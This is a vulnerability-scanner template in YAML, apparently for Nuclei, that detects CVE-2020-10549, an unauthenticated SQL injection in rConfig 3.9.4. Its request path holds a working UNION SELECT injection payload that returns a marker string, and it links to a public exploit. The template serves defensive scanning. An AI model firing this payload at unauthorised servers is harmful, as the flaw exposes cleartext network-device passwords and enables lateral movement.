25 lines
1007 B
YAML
25 lines
1007 B
YAML
id: CVE-2020-10549
|
|
info:
|
|
name: rConfig 3.9.4 SQLi
|
|
author: madrobot
|
|
severity: high
|
|
description: rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
|
|
reference: |
|
|
- https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py
|
|
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
|
|
tags: cve,cve2020,rconfig,sqli
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "[project-discovery]"
|
|
part: body
|